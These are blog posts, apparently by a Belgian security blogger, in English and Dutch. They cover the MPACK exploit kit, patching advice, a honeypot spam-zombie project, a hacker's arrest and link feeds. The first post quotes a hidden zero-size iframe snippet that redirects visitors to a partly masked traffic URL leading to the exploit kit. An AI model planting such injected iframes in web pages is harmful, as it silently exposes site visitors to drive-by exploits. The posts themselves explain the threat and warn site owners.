IFRAME name=’StatPage’ src=---------.555traff.com/trf/traf.php’ width=5 height=5 style=’display:none’></IFRAME
This is all it takes to be inserted in a comment or forum or blog or website or behind a picture to redirect you to a website that is infected with MPACK that will test your visitors against a whole series of vulnerabilities against which they mostly won't be defended against. As last week was very rich with new usable exploits against popular software, upgrades of the MPACK will even give more possibilities to the botnet users.
And every website that has a possilibity or vulnerability that lets others insert html code can become a part of this every day growing list of infected websites.
Wordpress users should upgrade their version very quickly, they are vulnerable.
Apache users should know that a vulnerability on one of the sites can make all the other sites hosted on the same server also make vulnerable if their Apache is not enough secured.
and there is also a problem with vbulletin, cpanel etc... etc... etc...
Het is weer zo ver. Men heeft weeral eens een nieuwe feature toegevoegd (grote foto's) zonder echt aan loadtesting te gaan doen en nu komt men tot de vaststelling dat de load daarvan veel te hoog ligt en dat dit de hele infrastructuur aan het ondermijnen is en moet men aan de noodremmen trekken.
Het lijkt me ook nogal onbegrijpelijk dat men niet alleen geen goede pretesting heeft gedaan, maar men heeft tevens zo te zien geen professionele of goede opensource of goed ingestelde realtime monitors - of men kijkt er niet naar. Want anders had men al direct preventief kunnen zien dat er zaken aan het verkeerd lopen waren.
Het probleem ligt dus bij de foto's. Maar zware foto's hoeven niet zozeer op een bloginfrastructuur te komen. Die dienen vanuit een photohostingdienst aan de blogservice te worden geleverd. En skynet heeft nu net zo'n dienst, maar er is spijtig genoeg geen enkele integratie met de functionaliteit van de blogs. Want met een filehosting omgeving kan je wel eenvoudig al die problemen veel gemakkelijker oplossen. Maar als men treuzelt met de integratie, dan kan het hele kasteel natuurlijk veel gemakkelijker uiteenvallen. Het geheel is meer dan de som der delen, alleen is er bij skynet nog geen geheel, laat staan een som van de delen.
werk aan de winkel zou ik denken
waar is dit wit blad ook al weer
The honeypot project let every website or domain owner in the world cooperate with some simple code to catch spam and malware. It than tries to list the responsable IP addresses.
For Belgium it is succeeding in getting even more spamzombies than ever before. But it will work for any ISP in any country.
the list of Belgian spamzombies or misused mailservers is here
The RSS feed for the Belgian infected spamzombies (mostly)
Please participate if you can
or if you work at an ISP help clean up the mess afterwards
Just back from holidays and more busy with backing up stuff than getting back to the actual deer state of the internet security in Belgium.
When the lone stupid young hacker was arrested the day after he hacked the forgotten website from the police (during lunch hours) he surely got the attention of the press - and as ususal the press felt silent afterwards. The press is only interested in the picture, the comical story effect of the act and is not asking any critical questions.
You can ask questions like
- are there many sites hacked in Belgium every week ? Yes there are. You can find a history and a fresh line up on http://be-hacked.skynetblogs.be
- is somebody actively informing those webmasters that they are hacked and that they should clean up their act ? No. I have done it sometimes but it sometimes takes too much time or even an agressive response. The reason is that nobody is taking any responsability for anything here.
- Are websites that are being hacked and stay hacked taken offline or blocked by the ISP's to protect their users ? No and even if Google is starting to block some hacked websites, they don't do it for all, even if I find them based on search words I use in Google.
- Are hackers being prosecuted or are ISP's trying to block access to and from control- or attackcenters on Belgian websites ? Sure not, who cares ?
So the SANS formed technician from the Belgium internet crime center didn't have to much trouble finding the stupid press hungry hacker and so he did what he had to do in the time-frame that it had to be done.
Let it be a lesson for anybody that reads and finds here security materials and guides. You can not under any circumstances use any of this stuff against any belgian infrastructure for which you don't have the explicit approval of the owner of the website and maybe of the infrastructure (if for example you are trying a DDOS or a DNS attack) .
For those who remember redattack. Well he is at home without work.
There is in Belgian no protection or exception for security researchers nor for white hackers and as far as I know there is also no sure way you can inform the people responsable of security wholes you have stumbled upon without putting yourself in danger. Maybe this is one thing to do for the next government. Or for the Computer crime center to reach out to the community.
Next to this blog I have adapted the Furlfeed. It will now take the latest 100 IT security articles I have passed over and furled.
In the http://be-hacked.skynetblogs.be you will only find one post with a Furlfeed to hacked websites. The copy of the hack itself you can find by clicking on the sign after the description. Some beautiful ones.
In the http://ebooks.skynetblogs.be you can now search directly into a collection of already more than 800 articles and books on my page in scribd.com. I have also placed a FURLfeed with links to sites and pages with lots of documents and articles.
In the http://freeware.skynetblogs.be you can now find also a FURL feed of sites with freeware, most of it is security and hacking stuff.